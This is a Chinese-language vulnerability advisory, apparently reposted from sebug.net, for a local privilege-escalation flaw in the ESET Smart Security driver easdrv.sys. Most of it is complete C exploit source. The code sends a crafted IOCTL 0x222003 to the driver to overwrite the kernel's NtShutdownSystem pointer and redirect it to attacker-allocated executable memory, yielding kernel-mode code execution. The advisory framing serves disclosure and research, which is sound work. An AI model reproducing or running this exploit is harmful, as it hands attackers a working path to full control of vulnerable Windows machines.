ESET Smart Security 'easdrv.sys'本地特权提升漏洞

:::决晓网络研究阵地:::
Eset Software Smart Security 3.0.667
描述:
BUGTRAQ ID: 30719
CNCAN ID：CNCAN-2008081903

ESET Smart Security是一款集成防火墙，反病毒的应用软件。
ESET Smart Security 'easdrv.sys'驱动存在输入检查问题，本地攻击者可以利用漏洞以内核进程权限执行任意指令。
文件：easdrv.sys
.text:00012B92 loc_12B92:
.text:00012B92 push [ebp+InputBuf]
.text:00012B95 call ds:off_1A200[eax]
.text:00012B9B mov ecx, [ebp+OutputBuffer]
.text:00012B9E mov [ecx], eax
ProbeForRead/Write没有检查输入和输出指针，当input/output指向内核模式内存(高于0x80000000)会导致蓝屏。
上面的代码可通过发送IoControlCode = 0x222003到设备\\.\\easdrv来触及。

<* 参考
http://www.orange-bat.com/adv/2008/adv.08.14.txt
*>
测试方法:
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
//
// ESET SmartSecurity priv. escalation
//
// visit www.orange-bat.com for full advisory
//
// g_
// g_ # orange-bat # com

#include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>

void TextError(LPTSTR lpszFunction)
{
    // Retrieve the system error message for the last-error code

    LPVOID lpMsgBuf;
    LPVOID lpDisplayBuf;
    DWORD dw = GetLastError();

    FormatMessage(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_FROM_SYSTEM |
        FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,
        dw,
        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPTSTR) &lpMsgBuf,
        0, NULL );

    // Display the error message and exit the process

    lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,
        (lstrlen((LPCTSTR)lpMsgBuf)+lstrlen((LPCTSTR)lpszFunction)+40)*sizeof(TCHAR));
    sprintf((LPTSTR)lpDisplayBuf,
        TEXT("%s failed with error %d: %s"),
        lpszFunction, dw, lpMsgBuf);
    //MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);

    printf(lpDisplayBuf);

    LocalFree(lpMsgBuf);
    LocalFree(lpDisplayBuf);
}

BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
  HANDLE hDevice;               // handle to the drive to be examined
  BOOL bResult;                 // results flag
  DWORD junk;                   // discard results
  IO_STATUS_BLOCK  IoStatusBlock;

  hDevice = CreateFile(DeviceName,
                    0,                // no access to the drive
                    FILE_SHARE_READ | // share mode
                    FILE_SHARE_WRITE,
                    NULL,             // default security attributes
                    OPEN_EXISTING,    // disposition
                    0,                // file attributes
                    NULL);            // do not copy file attributes

  if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive
  {
TextError("CreateFile");
    return (FALSE);
  }

  bResult = DeviceIoControl(hDevice,  // device to be queried
            Ioctl,
                            (PVOID)InputBuffer,
                            InputLen,
                            (PVOID)OutputBuffer,
                            OutputLen,     // output buffer
                            &junk,                 // # bytes returned
                            (LPOVERLAPPED)NULL);  // synchronous I/O

  if(!bResult){
   TextError("DeviceIoControl");
  }

  CloseHandle(hDevice);

  return TRUE;
}

int AllocMem(DWORD lpBase){

PVOID lpvResult;

   lpvResult = VirtualAlloc(
                     (LPVOID) lpBase, // Next page to commit
                     0x1337,         // Page size, in bytes
                     MEM_COMMIT,         // Allocate a committed page
                     PAGE_EXECUTE_READWRITE);    // Read/write access
   if (lpvResult == NULL ){
      TextError("VirtualAlloc");
      return 0;
    }
    else {
   printf("VirtualAlloc success\n");
    }

return 1;
}

int main(int argc, char *argv[])
{
DWORD Ioctl, Input, ILen, Output, OLen;
DWORD SSDT;

if(!AllocMem(0x80000)){
  return 1;
}

Input = 12345678;
SSDT = 0x80501414; //80501414  8060786e nt!NtShutdownSystem

Output = 0;
if(TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT-1, 4)){
  TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT+2, 4);

  printf("NtShutdownSystem now points to 0x80000 :)");
  printf("Jump to hyperspace in 2 seconds..");
  Sleep(2*1000);
  NtShutdownSystem(0);
}
else{
  printf("Failed to open device");
}

   return 0;
}